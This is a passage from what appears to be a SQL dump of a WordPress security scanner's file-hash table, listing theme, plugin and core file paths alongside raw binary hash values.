�#J������','',0,'?'),('�rI����ɀ5 �F�','wp-includes/Requests/Exception/Transport.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��l��z�� J�^�','����ĺ�̌��&���ֳ���4@78���p','',0,'?'),('�u_����~!\0�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y=\nY�99�2���','���6���\Z/���p�y5��E�ح���O�E','',0,'?'),('�z������|�z�xv','wp-includes/js/jquery/ui/droppable.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>���K�-�E،�N�','�\\�\'䰹\"�jq#�7��ER��F�0*�-�;|','',0,'?'),('����˕��r&�q�Fi','wp-content/plugins/wordfence/crypto/vendor/composer/installed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K:�Q�)�˸�:-*','��8}�ު�]��\"1���&(��䙄�����','',0,'?'),('�*���I�����','wp-content/themes/graphene/includes/theme-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��s�5T��o��','��~a�K���-K�W	�ue^�C3�@~���','',0,'?'),('Sa�n8|n�j8','wp-content/themes/catch-responsive/js/source/html5.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ި஄UPb��t�<','�R�y1N�hu�¿���I}��؞���)i','',0,'?'),('�%�K30��?�#���','wp-content/themes/singularity/template-parts/headers/pinned-thumbnail.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oF۳g��U�\0��h','���L�U�yXIc��+z�?ec�_:��ަ','',0,'?'),('�5Hc\r�#\\�q+���','wp-content/themes/brickyard/docs/assets/blueprint-css/plugins/buttons/icons/key.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=M�������|�m�','�!�\"&\"R�0�3U��?bBRI��$ҍ�\'���','',0,'?'),('��~�A:��\"��','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/lib/codemirror.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"/%C����jI\'{6','�����i�T�ў�k�?�{t�2��VҊ���','',0,'?'),('�;��+�&Y��Đ','wp-content/plugins/wp-cerber/assets/multi/multi.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z/�Wn�U#֬��V�K','��\"��%����6�rH��B)�xf�L]4t��','',0,'?'),('��4�Jf(Rs�nO','wp-content/themes/edge/inc/jetpack.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`s��$G�j\rCokJ','��3��-��vɉ\0T?Ž����Zn�8L$V','',0,'?'),('��e�y8�Z\r;B','wp-content/themes/newsmag/template-parts/banner/banner-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���%s�Z�\Z��v','��H�t�_[�I`I��.�Cx)\Z�֭�Jh�','',0,'?'),('�3	E-���#_yt�','wp-content/themes/Yegor/inc/tabs.php',0,'-��!��aKP����<p','-��!��aKP����<p','����B�ey\0�O�N0��S,n\\�z�o��ݗ4','',0,'?'),('リQ�����)B\n�,','wp-content/plugins/wordfence/images/loading_large.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y��{Ob�UW~�Y˙','p8�\'���	t���:�Q�o]{5G1����E��','',0,'?'),('��P��a`Xu','wp-admin/css/color-picker-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��i��S-MؼF�N','m\Z�Lչ����ο�1m�aɤ�Rr�1A7','',0,'?'),('��>��/�h�z`','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/addon/search/search.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','px\\��Q�ۿN���w','%��%�hۦ�LuYt�TS�\'[�/X�~>X�t�','',0,'?'),('��X=U�pfp���Z','wp-includes/taxonomy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5��H\nC8h��:��N','I�\r�u}��؁���Yw�Su:<IF���','',0,'?'),('����A�υ-0*����','wp-content/themes/skt-pathway/images/slides/slide3.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(>�PA��k��l��\Z�','�~2MKݍ��	�a	d����I��.�','',0,'?'),('�ތt+�\\�+�Xa�ZU','wp-content/plugins/wordfence/lib/wfScan.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��L�n�?2��a~��','�+p��=���ͨ�\'�Bk���@Cr\'ͺ�\'','',0,'?'),('��3�`�\"\0Q��#�8','wp-content/themes/wp-simple/inc/kirki/package.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�sZ���C�jW��0','�~��wi�~�`�t��F�3��7�&��#�4�\'t','',0,'?'),('��_�`�^�j���w�L','wp-content/themes/chronus/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(3����,�R�8\n	G','���X��\\\\M3���Ȭ����h�Ő�8˚��u-','',0,'?'),('�㯩�	\'��ި��V','wp-includes/images/smilies/icon_biggrin.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K��Jr��:�]kI�|',':������ٔ���M����X%	�<8�g4�','',0,'?'),('��&�e3%$��8:�:w','wp-content/themes/advance/inc/kirki/assets/js/controls/palette.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�x���Bq�#�\n��','�6F�[�شU�l���D���\0�\r5nRaMH','',0,'?'),('��6X�Ԫ4��[_��=t','wp-content/plugins/wordfence/lib/wfScanEngine.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wz�PQQ�#�Z>\0��D�','���i:��i`�\"��J��%<:���I��xcJ','',0,'?'),('��݌��g���Z��','wp-content/themes/auberge/image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��2]j�䥎���\'�','f�p{a�F�����P�]����h�F����','',0,'?'),('��c��G���(`E��','wp-content/plugins/wordfence/views/scanner/issue-configReadable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� �������Q��L','���R21�?nj*=bͥ}�����X&��M��Ʒ','',0,'?'),('��#y˞6�N�+','wp-content/themes/catch-responsive/inc/catchresponsive-metabox.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���%�:l46x�T','-g��ĸ�e����Dt/0B|z���8���9da��','',0,'?'),('��9��r�Mԧ��','wp-includes/js/customize-preview-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T-�6�P)H�=��','����6ª�e����yмbdf}��5��','',0,'?'),('�C�u\'FL���qV�k','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/controls/multicolor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ke�r��)���\n=','V��uЍ�#�:��Q�2���L ��ű\Za','',0,'?'),('� �ލ<:9�|��6','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-_�b�->O��\\苃','�sɔg�%��riC��P��w��%��{��J��','',0,'?'),('���6)Jo*��Nn+','wp-includes/js/dist/vendor/wp-polyfill-object-fit.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?с;��9�A����t�\n','�k���O�{d��PS���\0M�\"B]�\"�E��','',0,'?'),('�#^�(��F�H�=0�','wp-content/themes/hitmag/inc/kirki/includes/controls/class-kirki-controls-dropdown-pages-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H�0����熘y*v�','�s\\�LZ���}�[Z!so{Xl�A��Q���b�','',0,'?'),('�$�ī�I�^��3���','wp-admin/menu-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�P�j�v�˨!ң�','w��9=̠F5d��oU���\\_�k[�','',0,'?'),('�)���(]5�>�tz��','wp-content/themes/lovecraft/full-width-page-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ITv�JӮj��<��','_̪��X�\"�fR��+�M�Ji�J��\r��!','',0,'?'),('�02��2�DG-N��','wp-content/themes/edge/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Kԟ�����~��7eeK','eԨ��$�+�׹gY��6\n&�Y��0�\'�i','',0,'?'),('�>	�=�g�L�s�G�L','wp-content/themes/catch-flames/inc/panel/customizer-custom-scripts.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��I;$ݗD�������','���8kR��\\�x{�I�&~�PDrҬ@�','',0,'?'),('�I/\Z�N�2�����p','wp-includes/sodium_compat/src/Core32/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(��|v�}�9S�9S','\n,,Y�B��:�En������4�f\r�,��Zbq','',0,'?'),('�Z�ڬ�qJ�����)','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/addon/selection/active-line.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��!���t�zt��KG','�7�|\Zwqe�׹��uFN,:�\n��,M3S���B','',0,'?'),('�g-�_F�\"���~�\\^T','wp-content/plugins/all-in-one-wp-security-and-firewall/images/success.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t	I �C@g���','�(��(�	(\'S)\0B��_}&l�&�o^s�','',0,'?'),('�L�Ѝ��r� 3�#','wp-content/themes/university-hub/sidebar-secondary.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','EG�\n�Wf?���','�U����+�������7�M���d�#�','',0,'?'),('�c$D�5\rGX','wp-content/themes/skt-pathway/js/custom.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?���Ae��wԅ','���2��y{�i�|�.Ȏ�v�tdDA&��$','',0,'?'),('�\r��\'�5�O{T~�1','wp-content/themes/graphene/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\n�3��dJ��I۝�u\'','_�\rB;L,	Wff�0�e�+��-4\"�4H','',0,'?'),('��rt0�iܶ�','wp-content/themes/gambit/screenshot.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����ڧ�W��^��yt','��J_�#\Z4�Ԣ�0�%p�@�q�:\n�','',0,'?'),('�N ���iiڭ�','wp-includes/random_compat/random_bytes_libsodium_legacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[q�7d�v���z�','\'֪��*	[\0EE*J�r�V�s�����c�?','',0,'?'),('��(J��|H�c^O','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/merge/merge.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D��x��LE�U���','qv�OL�щ:�\\!�BM`��c\n��8W�J�S','',0,'?'),('��C�>�$Uh�j�d�','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/css/test.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t��+�س����\r]%','8�b���?��S1�\Z-$�0�Dsh��8q1�gu','',0,'?'),('�\'ݒ\rTvr���ŷ�','wp-content/themes/weblog/assets/img/no-image-690-400.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r�6�ؑ���`�q���',')S?�zZ�C� zB�]�A�n�L���抒���Q','',0,'?'),('�Ŵ ���W8AU}.G5�','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/addon/search/search.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','px\\��Q�ۿN���w','%��%�hۦ�LuYt�TS�\'[�/X�~>X�t�','',0,'?'),('��y�u�n���c[٧�','wp-includes/sitemaps.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gG�xN�)�/���*','�%��S�i����x3�k���O��nz]���','',0,'?'),('�з&�L۽¨��VN�','wp-includes/css/buttons.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a��n��G��f�g���','k!L4>H�i�AF��f�BR�eR@����W�','',0,'?'),('��E}����I��0Y�','wp-content/themes/event/inc/customizer/functions/featured-content-customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u��P�ŎB\0��4�','F�ɻ���B~�O�>��,n����?6m��E�','',0,'?'),('��(2\n}�]���/;*B','wp-content/themes/education-hub/third-party/cycle2/js/jquery.cycle2.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����-f�#�$�3��^','�{5����o���\nxeU�?��17��M���','',0,'?'),('��z�m��g�$�M�h','wp-content/themes/graduate/assets/uploads/banner-1.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ō�T��I��b�H�','���ߛ�XT\r�[ʋi4� �Vk�������w%�','',0,'?'),('�����9�$�DS�','wp-content/plugins/all-in-one-wp-security-and-firewall/images/feature-points-badge-bg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=5�gB����!b��','W��#nl3��P� r �l��c=א/ȑ��O:','',0,'?'),('����6$[���O�','wp-admin/css/customize-widgets.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%\'d	\\������sPu�','���o^	��I���_qJ�s��=�-+����','',0,'?'),('�C/s�/)H�','wp-content/themes/authorize/components/features/featured-content/display-featured.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�#k�T?G�	H�xu�','e��d�0z��i����Y[ϝ�5~į�*','',0,'?'),('���z�qK���‡��','wp-content/themes/wp-simple/assets/js/parallax.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�n�-�Y2A\Z_�L��','���v�F]Ì !T��R��i\n�&�Q*P�7','',0,'?'),('���rp.u�3zx�','wp-admin/includes/class-ftp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����c�Z*l3��$�','�B�1ô�	ͥ��5 �Q�������9�J','',0,'?'),('�&�?.\r�s��;�=9','wp-content/themes/twentynineteen/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}D�&��J����','z<����@���I�W�JP\n�T^tۜ�E�','',0,'?'),('�Խ}��`�!�x','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/addon/mode/overlay.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z����\0�T��T','tH�J�)(�X����?���N`dj�WE��','',0,'?'),('�\Z��+�*lG�m��*�','wp-content/themes/enigma/images/corporal.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�XC돧�dҌ���;','�@�W�h*�w���g���äX��y','',0,'?'),('�������\\�K\Z','wp-content/themes/simpleshift/inc/kirki/includes/output/control/class-kirki-output-control-typography.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C��͔jd�*\Z�B��','oA��3�~�Ϥ~��h�`{��-ڇ��R}�','',0,'?'),('�&[��>j���/��GU','wp-includes/js/dist/token-list.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]L\'9jl7��[#�','�\"�Gc��iL���z5�DwN�#G��ZT{*s}�','',0,'?'),('�7s�\\]�}�AA�we1�','wp-admin/tools.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�RC7�\n����TR�','v\'S�;��[�\nS�/[S6�&�G&�Ɩ8�','',0,'?'),('�8���םG2��*Ğ�','wp-content/plugins/wp-cerber/assets/sh/styles/shCore.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`L�1�Rg<�1�&�','g΀�0��!r�(��)�uT�T^۽S���Vv�','',0,'?'),('�9�\'lafT�zÅ��','wp-content/themes/Endolf/FT/colors.php',0,'|݄���Q���','|݄���Q���','SU��C��ZL҆A�;)�J��๤�\'�','',0,'?'),('�=��7TXd/\\�}�u?','wp-content/themes/catch-responsive/css/colors/dark.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���U䦸(�&�VA�K','��\'��p����\ZL���`)�%�P��D','',0,'?'),('�?���TTi�P�C.�3%','wp-content/themes/graphene/images/social/furl.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P�@t�zFr����)�0','�u��I�.��l�G��A)��]�p����?\0k','',0,'?'),('�D{X5	��K(�?�o','wp-content/themes/Yegor/FT/plugin/options-framework/includes/class-options-framework-admin.php',0,'ފX�qq�&zʭw�','ފX�qq�&zʭw�','��AQ��#F���fScI�m�|80��n�','',0,'?'),('�T��-h�W!,�oT�w','wp-content/themes/wp-simple/inc/kirki/kirki/assets/scss/controls/color-palette.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b�D���ܣ���j','�e��7n�!� f��D\Zh\'�J6SJo�1�','',0,'?'),('�Z/���{Lt�ծF$�','wp-admin/js/svg-painter.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�\'�;I6��U+�K�','A�Οն<��ލ��&0��>�k]�-GfN�','',0,'?'),('񆍐�Z	�=9z�','wp-content/themes/Kent/FT/inc/lessc.php',0,'���y\\������wб=','���y\\������wб=','�*�-wc�N��8qEiIy1\Zs���N�d�@�','',0,'?'),('�v�:�D�Y�G','wp-includes/js/plupload/plupload.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���6�JJ�7�+�','�+\"��Q���/N:�T$��\"���ȯ\r8v_3','',0,'?'),('��+�\rv4�<Af���','wp-content/themes/auberge/library/visual-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N�@��i+��_c��','�CK���gз�5�\'n��3��C���b%��@�','',0,'?'),('񞉷�i6\'����S�C','wp-content/themes/brickyard/docs/assets/blueprint-css/plugins/rtl/screen.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����g!�K\'n#�a�','�%�o�_O���G��Y�h�W�x�I��+Oe#c','',0,'?'),('��m�	�6����$E','wp-content/themes/education-hub/sidebar-secondary.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}�F<v�8YS\':\\','�k�u��	�`���{��%n���f�<K��','',0,'?'),('�6A���u���{','wp-content/themes/simpleshift/assets/images/glyphicons-halflings.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%3�p�����s��\n','P#}�Ym�o�vÀJh�Fr)���X-p','',0,'?'),('�TY�PpE�w��','wp-includes/widgets/class-wp-widget-archives.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�POůJ�~�l�.�J','�o���`|?�0�5���q����_	!-+}Q�V-�','',0,'?'),('��4�����$ꎪ','wp-content/plugins/wordfence/views/scanner/scan-scheduling.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A�i@�\\�`=�y�7\0','���-\020�[��5�B���c��^V�u8��k�','',0,'?'),('�ծ��_k,�C)u��','wp-content/themes/hitmag/inc/kirki/assets/js/controls/typography.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r�[����Cdߌ�;��','�����z��4Y����L\Ze�^�@�(��','',0,'?'),('��\0�skk�Tu3So\\�','wp-content/plugins/wp-cerber/assets/flags/mw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/��a�D�o�=hs','4[����Պ\'6N���RP��15��}\Z��s�','',0,'?'),('�絛�zy���>_+�t','wp-includes/class-wp-user-meta-session-tokens.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8/\'\0�\0��vSL-G\0','����8�b�YB&?�6��o���>','',0,'?'),('��c3n�@}h�ˇ','wp-content/themes/simpleshift/inc/kirki/includes/controls/class-kirki-controls-sortable-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|�sU�b;\Zy\rѽ>','�N,�GKA���|��*��Y$��\"\Zg^v��B�N�','',0,'?'),('�&�^$��_[��2z0','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/mode/xml/test.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y��YVЌ,�ؚ>\0-','�1��\\��cG#&L(,bض��y��׀xl','',0,'?'),('�{�6���Փ�\r�+��','wp-content/themes/authorize/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S^Vt�����V���ay','!����w7�B��H�5���<�_��M0`x','',0,'?'),('�\n�W*pR�}CG#y�','wp-content/themes/exoplanet/images/exoplanet-dark-mosaic.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��pr�W��/*�qE','vB/F����pc?7���g>�(���\Z��','',0,'?'),('�X0i�`�^���	M','wp-content/themes/enigma/css/font-awesome-4.7.0/HELP-US-OUT.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���n�7,�z\r�A�S','|�\\��l��V�E2G-���-[��*���d�n','',0,'?'),('�m�?R n�U}�Y','wp-content/themes/Endolf/FT/plugin/options-framework/js/media-uploader.js',0,'�A���@�k@VgdH','�A���@�k@VgdH','�l��k��&��Snt��m���b�̧:S���-1','',0,'?'),('���H�r #�w/�:4','wp-includes/js/dist/plugins.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Eg���Zm\Z��4\0�','�ьZ;�9�c`.�Є�7��7�S��Z?��mߜ','',0,'?'),('�#��]�grW�,p�','wp-content/themes/gambit/rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Mz6�]u�g��@V�','a���[��,#��P>ʢC\ra������w��^1','',0,'?'),('�,����U(�e�jR.XP','wp-content/plugins/wp-cerber/assets/flags/aq.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('�1\n�����x����','wp-includes/blocks/latest-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i{�$F�ČPի!','\Z:����F��s�K�����\\��W����\r��','',0,'?'),('�?��E_�)�xڅ$��','wp-admin/includes/deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#�#1���@伫֝k','y�\"pB�c�h��\0�PhD�Rd��\0bKO��','',0,'?'),('�P)rl\Z���͝�-{|�','wp-content/themes/catch-flames/inc/catchflames-featured-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0�s5y�羯=n6;r�','%-�˳��O�ر�\nO\"Z�<��ȡ�dR6�L','',0,'?'),('�U���e8�����N+','wp-content/themes/wp-simple/inc/kirki/assets/js/controls/radio-image.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B_-\rs��NJ+��','�	�2C�Zf��{N�\0~�{hR_ ~~�1���>U','',0,'?'),('�\\��.\nEp	j��[','wp-content/themes/enigma/css/font-awesome-4.7.0/css/font-awesome.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K��rFR��	S&2�','����}��˹t$��)�ʦ��P��1��~܀��','',0,'?'),('�d�To�f��ҷ�bS','wp-content/plugins/wordfence/lib/menu_dashboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��1q��X}k8�','����\ZI(�b��ܚo��ߍ�9�\0�	ȅE2','',0,'?'),('�j��\nj<�c�@B�X','wp-content/plugins/wordfence/modules/login-security/views/options/option-textarea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�q�טw�U��ͰR�','�JwYw�u�n��[���&D�FLV-�2L���','',0,'?'),('�po���X0%������','wp-includes/css/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b��d�(�*ț��K��','���$��l#��X#u��>�G�j�I;ߗ߮','',0,'?'),('�u;Ȍ0�q�w��=��','wp-content/plugins/wordfence/lib/dashboard/widget_networkattacks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8q�X�n�_�tҐi�','Sb�O��m����/IQ>SĊW�ɖT�oV�+a','',0,'?'),('�yA��>�WXM�.hr7','wp-content/themes/weblog/acmethemes/customizer/header-options/header-logo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���63�����Pd��','�G1����^����SX�^���Ͳ��N��','',0,'?'),('�|6[ ws;S��`G�>','wp-content/themes/hitmag/inc/kirki/includes/scripts/class-kirki-scripts-tooltips.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':ۨ�+ӧ+��L�','ǕI{�+$�`o�	�>�C�M�[\0B�\Z8y�','',0,'?'),('���U���a&�V�:','wp-content/themes/simpleshift/assets/images/preview/184x184-2.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u<�dJ�2ar2��m','�Sfs ?��O6r��z���,i��VI��','',0,'?'),('�|�v���,�lB\r�','wp-content/themes/catch-flames/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P�Ռ��.t��lh','���8���zV<�.-��5�~�K��','',0,'?'),('���jK�&����Y','wp-content/plugins/akismet/class.akismet-admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����a�&+�!�]�M�','���iK�I�]�#:6���o�EP�\n�nR$���\r','',0,'?'),('�Z!jZ;�Ze�fb','wp-content/themes/enigma/author.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��U:�:�肅���\'3','�ʲ/�+�<�<̏�\Z�A��%H��N�oP_D','',0,'?'),('�� �9�\07i�','wp-content/themes/graduate/tp-education/template-parts/content-single-team.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����y��{R��c�','j`�7ڤOJ����Z�֚�;�⡷� ','',0,'?'),('�$c{�97^І�J�g','wp-includes/js/dist/server-side-render.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6�o�i)=�\"p�Jhl','m��z��}ힳ�M��|N�b����Zi�-','',0,'?'),('򩈹Z�uS�5���|','wp-content/themes/saybusiness/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-%+%���n�<�h�3','�_a��h{������7;�����[U<�','',0,'?'),('��ŕ��oi|}��','wp-includes/block-supports/custom-classname.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ؚ�WiY�C��v�G','� #rCҗ�)�[�ȫ�R̞[���Q�\\�&��','',0,'?'),('�M�٦M�/`�','wp-includes/js/swfupload/handlers.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*�#�0�-�Ճp�','H�#����a:��1������߯orrj�uz�zV','',0,'?'),('򱠭��B�R�z��Y','wp-includes/js/jquery/jquery.table-hotkeys.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o�go����~i�I	�','�<��=���;�:�t_,w�ăI���,�,��','',0,'?'),('�?{o_���\'�n�','wp-admin/images/resize-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{3VV��FV�f�%K','懴y2q��Z�o��~��([��`\0`C�i\ZL\'','',0,'?'),('���_f $�O<o','wp-admin/js/common.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$�ϋOny&��-���n',',�#�]�d���!�I|�4<�n�ނ�r\0,�','',0,'?'),('��>S`*uu\\n�/d�','wp-content/themes/lovecraft/genericons/genericons.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�B����+�ذ	q','�q����8�0��C���_Z%�w8o޺��x','',0,'?'),('��%�\0��z�f�N�pS','wp-includes/js/tinymce/plugins/wpemoji/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SE���x=d��~���eM','\"�w�%%{���=L(���hK�\rƢH�P','',0,'?'),('�՝�e�rA�����:�','wp-content/themes/hitmag/inc/kirki/assets/scss/controls/color.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��蔿�n����g���','JG*��r\0�df� >}�����\\�^��N','',0,'?'),('��w�+\"+�$��^�','wp-content/plugins/wordfence/lib/wfLog.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WN ;ƶxv��/	�','K�PQn\"�_(�X/4S�䖏C�9�yA�K�L','',0,'?'),('������3Z[���','wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-select2-multiple.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���NT����}m\rV�m�','>�q{(�+fޙ`�=��a@��3bzܥа�l','',0,'?'),('��f��%��Z�3?','wp-content/themes/hitmag/inc/kirki/includes/class-kirki.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n�W	:٢��^���','`�^\"�\Zនg�=/�;o��Hd\r�$vA#pa','',0,'?'),('��\Z�B 